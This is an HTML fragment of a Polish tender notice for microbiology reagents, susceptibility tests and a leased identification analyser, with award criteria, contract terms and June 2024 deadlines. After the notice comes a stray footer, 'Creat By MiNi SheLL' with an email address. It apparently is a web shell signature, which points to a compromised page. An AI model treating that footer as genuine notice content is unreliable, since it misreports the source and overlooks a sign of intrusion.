Podłoże chromogenne do identyfikacji szerokiego spektrum mikroorganizmów w moczu 6000<br/>6	Podłoże chromogenne Candida 360<br/>7	Podłoże do dermatofitów 3500<br/>8	Zestaw odczynników do barwienia Gramma	4x240ml	15<br/>Testy do identyfikacji drobnoustrojów oraz oceny lekowrażliwości z dzierżawą aparatu<br/>10	Testy do identyfikacji drobnoustrojów Gram-ujemnych 2000 testów<br/>11	Test do identyfikacji drobnoustrojów Gram-dodatnich 1000 testów<br/>12	Testy do identyfikacji drobnoustrojów trudnorosnących (Neisseria/Haemophilus) 100 testów<br/>13	Testy do identyfikacji bakterii beztlenowych 40 testów<br/>14	Test do identyfikacji grzybów 160 testów<br/>15	Testy do oceny lekowrażliwości drobnoustrojów Gram-ujemnych 6000 testów<br/>16	Testy do oceny lekowrażliwości drobnoustrojów Gram-ujemnych wielolekoopornych 1000 testów<br/>17	Testy do oceny lekowrażliwości drobnoustrojów Gram-dodatnich 1000 testów<br/>18	Testy do oceny lekowrażliwości grzybów 40 testów<br/>19	Odczynniki i akcesoria wymagane do wykonania wyżej wymienionych testów <br/>20	Aparat do automatycznej identyfikacji i oceny lekowrażliwości drobnoustrojów (z oprogramowaniem)	miesiąc	36 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dla pakietu nr 1:<br/> Dla analizatora: specyfikacja techniczna analizatora wraz z prospektem (katalog, folder).<br/><br/>Dla pakietu nr 3: <br/> Dla aparatu: specyfikacja techniczna wraz z prospektem (katalog, folder). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.	Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>- dokumenty, o których mowa w Rozdziale VIII ust. 1 (przedmiotowe środki dowodowe) i rozdz. XI ust. 1 pkt 1 i 2 SWZ;<br/>- wypełniony i/lub podpisany załącznik nr 2.1A, 2.2A, 2.3A i 2.3B do SWZ, <br/>- dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale XI ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które części zamówienia wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty stanowiące podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy są możliwe w następujących przypadkach:<br/>1)	zastąpienie produktu objętego umową odpowiednikiem w przypadku:<br/>- okresowej niedostępności produktu lub zaprzestania wytwarzania produktu objętego umową lub wprowadzenia na rynek produktu o lepszych parametrach (zastąpienia go nowym produktem);<br/>- wygaśnięcia rejestracji; <br/>2)	zmiana sposobu konfekcjonowania produktu w wielkości opakowania;<br/>3)	jeżeli Wykonawca dostarczający przedmiot zamówienia zmienił dane firmy (np. w wyniku przekształceń, przejęć itp.) możliwe jest sporządzenie aneksu do umowy zmieniające dane firmy;<br/>4)	w przypadku, gdy nastąpiła zmiana stawki podatku VAT, cena netto nie ulegnie zmianie, nastąpi jedynie zmiana ceny brutto;<br/>5)	zmiana terminu realizacji umowy w przypadku nie wykorzystania łącznej kwoty brutto zobowiązania tj. jej przedłużenie;<br/>6)	zmiany numerów katalogowych oferowanych produktów w przypadkach, o których mowa w pkt 1 (po uzyskaniu akceptacji Zamawiającego), w cenach i na warunkach realizacji zamówienia określonych w umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-24 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zozwolasrodmiescie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-24 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com